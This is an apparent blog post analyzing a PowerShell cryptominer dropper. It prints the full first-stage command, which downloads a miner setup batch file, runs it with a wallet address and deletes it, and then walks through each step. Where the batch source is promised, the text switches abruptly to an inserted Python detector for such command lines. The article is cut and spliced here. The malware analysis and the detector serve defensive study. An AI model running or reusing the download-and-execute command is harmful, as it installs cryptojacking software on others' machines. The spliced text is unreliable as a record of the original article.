Analysis CryptoMiner Sample ( Script Based )

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
By Diyar Saadi | WIN32
July 16, 2025

In this article we analyze a PowerShell script that downloads and runs a batch script to perform crypto mining. Crypto mining is conducted using specialized computer hardware to solve complex mathematical puzzles, validating and recording transactions on a blockchain.

Sample SHA-256 : d27411cd11d31d025ccc9fac9d49aa5a91aa934e9964a54340e25fbff886ed9b

Malicious Code ( First Stage ) :

    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 85qqTVL8RQGJSvZMfenDwqBUyVrsaNpVWUMxnXKzbcwAM; Remove-Item -Force $tempfile"

Malicious Code Analysis ( First Stage ) :

1- The malware developer declares a variable holding a WebClient object, which is used to download content from the internet and drop it into the %TEMP% folder.

Code (1) :

    powershell -Command "$wc = New-Object System.Net.WebClient;

2- Downloading process :

    $wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat'

Batch Script SRC :
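A defender-side check for the first-stage chain analyzed above (WebClient download into a temp file, execution of that file with an argument, then deletion), as an added example that is not part of the original article. It assumes process command lines are available from logging such as Sysmon Event ID 1; the function name, verdict labels and sample lines are constructed for illustration.

```python
import re

# Each first-stage behaviour as a regex over a process command line
# (e.g. Sysmon Event ID 1 or Security 4688 with command-line auditing).
STEPS = {
    "webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "temp_file": re.compile(r"\[(System\.)?IO\.Path\]::GetTempFileName\(\)", re.I),
    "download": re.compile(
        r"\.DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*(?P<var>\$\w+)", re.I),
    "cleanup": re.compile(r"Remove-Item\b[^;]*\$\w+", re.I),
}

def analyze(cmdline):
    """Report which steps appear, the download URL and the dropped script's arguments."""
    steps = {name for name, rx in STEPS.items() if rx.search(cmdline)}
    result = {"steps": steps, "url": None, "args": None, "verdict": "no-match"}
    dl = STEPS["download"].search(cmdline)
    if not dl:
        return result
    result["url"], result["verdict"] = dl.group("url"), "download-only"
    # Execution: the call operator (&) applied to the same variable that received
    # the download; text up to ';' or the closing quote is the argument list.
    run = re.search(r"&\s*" + re.escape(dl.group("var")) + r"\b\s*(?P<args>[^;\"]*)",
                    cmdline[dl.end():], re.I)
    if run:
        steps.add("execute")
        result["args"] = run.group("args").strip() or None
        result["verdict"] = "download-and-execute"
    return result

# Constructed command lines (placeholder URL and wallet, not values from the sample).
SAMPLES = [
    r'''powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://example.invalid/setup.bat', $tempfile); & $tempfile WALLET_PLACEHOLDER; Remove-Item -Force $tempfile"''',
    r'''powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://example.invalid/report.csv', $out)"''',
    r'''powershell -Command "Get-ChildItem C:\Logs | Remove-Item -Force"''',
]

if __name__ == "__main__":
    for line in SAMPLES:
        r = analyze(line)
        print(r["verdict"], sorted(r["steps"]), r["url"], r["args"])
```

The extracted `url` and `args` fields give the two pivots an analyst needs from such an event: the hosting location of the second stage and the argument (here, the wallet) passed to it.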